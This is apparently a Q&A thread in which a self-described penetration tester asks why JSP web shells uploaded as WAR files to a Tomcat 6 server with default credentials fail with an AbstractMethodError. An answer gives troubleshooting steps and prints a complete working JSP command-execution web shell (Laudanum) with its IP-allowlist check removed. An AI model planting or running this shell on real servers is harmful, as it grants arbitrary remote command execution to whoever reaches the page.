# Upload shell in tomcat exception

Tags: java, security, exception, tomcat

I'm a security consultant and i'm currently doing a pentest for a client who has a Tomcat with default credentials. I want to make understand the problem of this to my client and i've searching around a few WAR shells out there but none of them seems to work.

When i upload any WAR shell such as this one:

https://github.com/danielmiessler/SecLists/blob/master/Scripts/Backdoors/Web%20Backdoors/laudanum-0.8/jsp/cmd.war

I recieve the following error no matter what shell i upload:

```
HTTP Status 500 -

type Exception report message description The server encountered an internal error () that prevented it from fulfilling this request.

exception

javax.servlet.ServletException: java.lang.AbstractMethodError: javax.servlet.jsp.JspFactory.getJspApplicationContext(Ljavax/servlet/ServletContext;)Ljavax/servlet/jsp/JspApplicationContext;
org.apache.jasper.servlet.JspServlet.service(JspServlet.java:268)
javax.servlet.http.HttpServlet.service(HttpServlet.java:717)

root cause

java.lang.AbstractMethodError: javax.servlet.jsp.JspFactory.getJspApplicationContext(Ljavax/servlet/ServletContext;)Ljavax/servlet/jsp/JspApplicationContext;
org.apache.jsp.cmd_jsp._jspInit(cmd_jsp.java:24)
org.apache.jasper.runtime.HttpJspBase.init(HttpJspBase.java:52)
org.apache.jasper.servlet.JspServletWrapper.getServlet(JspServletWrapper.java:164)
org.apache.jasper.servlet.JspServletWrapper.service(JspServletWrapper.java:340)
org.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet.java:313)
org.apache.jasper.servlet.JspServlet.service(JspServlet.java:260)
javax.servlet.http.HttpServlet.service(HttpServlet.java:717)
```

Any ideas why this or any other JSP shells aren't working here? It used to work for me on other scenarios when using Tomcat.

It's a Tomcat 6.0.5.

Thanks a lot.

**UPDATE:**
When trying to upload this file: http://www.vonloesch.de/files/browser.zip
With the following web.xml:

```
<?xml version="1.0" encoding="ISO-8859-1"?>

<!DOCTYPE web-app 
PUBLIC "-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN" 
"http://java.sun.com/dtd/web-app_2_3.dtd">

<web-app>

<servlet>
  <servlet-name>browser</servlet-name>
</servlet>

</web-app>
```

I'm still getting the same error.

Answer (score 2):

**UPDATE:**

This may be an issue with the Tomcat server (installation) or the application that you're deploying the files into:

1. Make sure that you do not have jsp-api-*.jar in /WEB-INF/lib directory of your application(s).
2. You may have a tainted cache/scratch work directory, in which case try this:

   - Stop Tomcat
   - Backup and delete the content of $CATALINA/work
   - Start Tomcat and trying your apps

====

I'm not sure about the content of the WAR file, but cmd.jsp in the Github repository has an syntax error on line 5 (missing ;). Additionally, there is logic to return a 404 if the client IP address is not 4.4.4.4.

I've removed the "IP filter" code (fixing the syntax error); replace the content of cmd.jsp with the code below.

```
<%@ page import="java.util.*,java.io.*" %>

<HTML>
<TITLE>Laudanum JSP Shell</TITLE>

<BODY>
Commands with JSP
<FORM METHOD="GET" NAME="myform" ACTION="">
    <INPUT TYPE="text" NAME="cmd">
    <INPUT TYPE="submit" VALUE="Send"><br/>
    If you use this against a Windows box you may need to prefix your command with cmd.exe /c
</FORM>
<pre>
<%
    if (request.getParameter("cmd") != null) {
        out.println("Command: " + request.getParameter("cmd") + "<BR>");
        Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
        OutputStream os = p.getOutputStream();
        InputStream in = p.getInputStream();
        DataInputStream dis = new DataInputStream(in);
        String disr = dis.readLine();
        while (disr != null) {
            out.println(disr);
            disr = dis.readLine();
        }
    }
%>
</pre>
<hr/>
<address>
    Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
    Written by Tim Medin.<br/>
    Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
</address>
</BODY>
</HTML>
```

Comment: Thanks a lot for the fix Johann but i'm getting the same error. It happens to me when i upload any other app aswell such as this one: http://www.vonloesch.de/filebrowser.html

Comment: @Igarr The file browser works fine on a clean Tomcat server. How and where are you deploying these applications (Tomcat manager)? Are you dropping the .jsp files into an existing application or creating a new application?

Comment: Yeah i know, even i've been using this files in another server and it worked. I'm deploying it trough the App Manager by using a WAR file